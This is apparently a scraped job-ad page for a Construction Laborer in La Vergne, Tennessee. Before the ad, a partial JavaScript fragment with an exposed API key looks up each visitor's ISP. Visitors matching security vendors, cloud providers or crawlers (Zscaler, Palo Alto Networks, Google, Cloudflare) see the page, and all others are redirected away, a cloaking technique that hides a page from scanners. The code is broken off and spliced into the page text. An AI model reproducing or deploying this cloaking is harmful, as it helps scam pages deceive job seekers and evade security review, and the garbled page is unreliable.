Construction Laborer
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a reliable Construction Laborer to join our team in La Vergne, Tennessee. In this role, you will assist with various construction activities to ensure project completion on time and to quality standards.
Responsibilities include:
- Loading, unloading, and organizing materials and tools on site
- Assisting skilled tradespeople with tasks such as measuring, cutting, and assembling
- Preparing and cleaning construction sites, including setting up safety barriers and signage
- Following safety protocols and wearing appropriate protective gear
- Supporting with demolition, excavation, and general labor duties as needed
Skills needed:
- Physical stamina and strength to perform manual labor
- Ability to follow directions and work as part of a team
- Good communication skills and attention to safety
- Reliability and a strong work ethic
Benefits include competitive pay, health insurance options, paid time off, and opportunities for advancement in a supportive environment.